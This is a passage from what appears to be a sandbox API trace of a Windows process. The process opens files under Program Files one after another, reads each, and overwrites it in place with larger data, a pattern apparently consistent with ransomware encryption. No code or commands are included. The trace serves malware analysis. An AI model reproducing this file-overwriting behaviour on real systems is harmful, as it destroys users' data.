lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0132.364] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.364] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.364] ReleaseMutex (hMutex=0x168) returned 1 [0132.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0132.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST", cchWideChar=3, lpMultiByteStr=0x1f7ace4, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MST", lpUsedDefaultChar=0x0) returned 3 [0132.365] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.366] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.367] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.367] CloseHandle (hObject=0x1cc) returned 1 [0132.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Enderbury" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\enderbury"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.369] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.369] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x59 [0132.369] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.369] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.369] ReleaseMutex (hMutex=0x168) returned 1 [0132.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enderbury", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0132.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enderbury", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enderbury", lpUsedDefaultChar=0x0) returned 9 [0132.369] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x345f2bc*=0x59, lpOverlapped=0x0) returned 1 [0132.371] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.371] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0132.371] CloseHandle (hObject=0x1cc) returned 1 [0132.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.372] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.372] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x69 [0132.372] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.372] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.372] ReleaseMutex (hMutex=0x168) returned 1 [0132.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Honolulu", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Honolulu", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Honolulu", lpUsedDefaultChar=0x0) returned 8 [0132.373] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebb448, nNumberOfBytesToRead=0x69, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebb448*, lpNumberOfBytesRead=0x345f2bc*=0x69, lpOverlapped=0x0) returned 1 [0132.374] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.374] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5f1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5f1, lpOverlapped=0x0) returned 1 [0132.374] CloseHandle (hObject=0x1cc) returned 1 [0132.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.375] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.375] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x61 [0132.376] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.376] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.376] ReleaseMutex (hMutex=0x168) returned 1 [0132.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nauru", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nauru", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nauru", lpUsedDefaultChar=0x0) returned 5 [0132.376] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x345f2bc*=0x61, lpOverlapped=0x0) returned 1 [0132.377] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.377] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0132.378] CloseHandle (hObject=0x1cc) returned 1 [0132.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.388] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.388] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0132.388] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.388] ReleaseMutex (hMutex=0x168) returned 1 [0132.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port_Moresby", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port_Moresby", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Port_Moresby", lpUsedDefaultChar=0x0) returned 12 [0132.388] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.389] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.390] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.390] CloseHandle (hObject=0x1cc) returned 1 [0132.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.391] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.391] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4f8 [0132.391] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.391] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.391] ReleaseMutex (hMutex=0x168) returned 1 [0132.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8PDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8PDT", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PST8PDT", lpUsedDefaultChar=0x0) returned 7 [0132.391] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3ee68, nNumberOfBytesToRead=0x4f8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3ee68*, lpNumberOfBytesRead=0x345f2bc*=0x4f8, lpOverlapped=0x0) returned 1 [0132.403] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.404] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa80, lpOverlapped=0x0) returned 1 [0132.404] CloseHandle (hObject=0x1cc) returned 1 [0132.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.372] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.382] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0133.387] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.387] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.387] ReleaseMutex (hMutex=0x168) returned 1 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0133.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MST7", lpUsedDefaultChar=0x0) returned 4 [0133.387] ReadFile (in: hFile=0x208, lpBuffer=0x1f88678, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88678*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0133.389] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.389] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0133.389] CloseHandle (hObject=0x208) returned 1 [0133.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\LICENSE" (normalized: "c:\\program files (x86)\\java\\jre7\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.390] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.390] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x29 [0133.390] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.391] ReleaseMutex (hMutex=0x168) returned 1 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0133.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICENSE", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LICENSE", lpUsedDefaultChar=0x0) returned 7 [0133.392] ReadFile (in: hFile=0x208, lpBuffer=0x1fa53f8, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa53f8*, lpNumberOfBytesRead=0x345f2bc*=0x29, lpOverlapped=0x0) returned 1 [0133.393] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.393] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0133.394] CloseHandle (hObject=0x208) returned 1 [0133.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.396] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.396] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x78e4 [0133.396] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.396] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.396] ReleaseMutex (hMutex=0x168) returned 1 [0133.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0133.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Informix.xsl", lpUsedDefaultChar=0x0) returned 12 [0133.396] ReadFile (in: hFile=0x208, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0133.398] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x68e4 [0133.398] ReadFile (in: hFile=0x208, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0133.399] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x68e4 [0133.399] WriteFile (in: hFile=0x208, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0133.399] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0133.399] WriteFile (in: hFile=0x208, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0133.399] CloseHandle (hObject=0x208) returned 1 [0133.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\3dftp.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\3dftp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0133.400] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\3dftp.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\3dftp.exe", lpFilePart=0x345f690*="3dftp.exe") returned 0x3a [0133.400] GetLastError () returned 0x20 [0133.400] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x51 [0133.427] LocalFree (hMem=0x696c00) returned 0x0 [0133.427] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0133.427] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0133.428] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.428] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.428] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\3dftp.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\3dftp.exe")) returned 0x20 [0133.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.431] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.431] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x889 [0133.431] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.431] ReleaseMutex (hMutex=0x168) returned 1 [0133.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon.png", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0133.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon.png", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon.png", lpUsedDefaultChar=0x0) returned 8 [0133.432] ReadFile (in: hFile=0x208, lpBuffer=0x25a0038, nNumberOfBytesToRead=0x889, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesRead=0x345f2bc*=0x889, lpOverlapped=0x0) returned 1 [0133.433] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.433] WriteFile (in: hFile=0x208, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xe11, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f2d0*=0xe11, lpOverlapped=0x0) returned 1 [0133.434] CloseHandle (hObject=0x208) returned 1 [0133.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.435] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: 